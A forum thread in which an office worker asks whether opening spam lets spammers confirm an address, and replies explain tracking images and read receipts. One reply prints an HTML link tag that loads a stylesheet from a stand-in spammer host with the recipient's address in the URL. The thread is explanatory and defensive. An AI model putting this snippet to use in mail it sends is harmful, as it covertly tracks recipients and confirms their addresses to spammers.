email address verification tricks for Spammers..

[cakeman]

Tiny bit of background - some 50 computers in the company I work at.. our "IT Manager" (ITM) is named so because when they needed one, he was the only guy who didnt run screaming when an error box pops up in windows.. an ok coder he may be.. but he's mostly clueless otherwise.

We have a contractor that the ITM calls when any server/network issues pop up.. and then me, who takes care of the general "my computers doing something weird" requests on top of my other tasks within the place..

ITM had recently made some changes that would result in our local systems dealing with the "maybe" spam emails rather than our ISP stopping everything.. therefore our users were getting some in their inboxes etc..

During our conversation he asked, horrified, "Well, you don't actually OPEN any of something you think -might- be spam, do you?!" .. "the contractor told me the other day the spammers can tell if you even open the email!"

I pointed out that unless there are images (or even a pixel) keyed to my address in an HTML email, then there wasnt really any way for a spammer to know I'd opened it... unless I were stupid enough to click on a link. As I typically have image loading turned off, or force viewing in Plain Text its not an issue.

Figuring how quickly things can change, I figured I may as well confirm my beliefs with more experienced people before I decide to scrap it out with him some. Im sure viewing in Plain Text is safe, and with image loading turned off in Outlook, its pretty much a dead end for address confirmation for the spammer, correct?

thanks.

[Merlyn]

As long as images and external html/scri_pt loading is turned off and you never send a read receipt I don't believe they know you received the email. They might assume you received it if it wasn't blocked (see rule #3)

[Telarin]

Correct, unless you load something from a server somewhere (i.e. images) or have delivery or read receipts turned on in outlook, there is no way for the spammer to know the email has been viewed.

[rconner]

Correct, unless you load something from a server somewhere (i.e. images) or have delivery or read receipts turned on in outlook, there is no way for the spammer to know the email has been viewed.

There is actually one other way to tag an e-mail, but I am not sure how many browsers or mail programs are vulnerable. I could have sworn I posted this earlier, but maybe I didn't.

The spammer can call in an external stylesheet file from within the HTML header in the message body using a LINK tag, viz.

<head>
	<link 
		rel="stylesheet" 
		href="http://ispamu.foo/x.pl?your-address-here">
</head>

What this does is to cause the recipient's browser or mail program to request the external stylesheet file returned by the href link. This fetch will be recorded in the spammer's web server logs just like any other HTTP fetch.

It probably doesn't matter whether the stylesheet ever gets used (i.e., whether there are any "styled" elements in the HTML), or even whether the stylesheet link actually works (i.e., returns some CSS info). Getting the tagged URL into his server logs (even the error log, perhaps) means that the spammer has captured the tagged data.

Even if you turned off image loading or scripts, this trick could theoretically still work if your browser or mail program doesn't block requests for stylesheets.

See my website at http://www.rickconner.net/spamweb/analysis08.html. This page is a couple of years old, and I haven't seen the trick used again in recent memory, so perhaps it is a dead end.

-- rick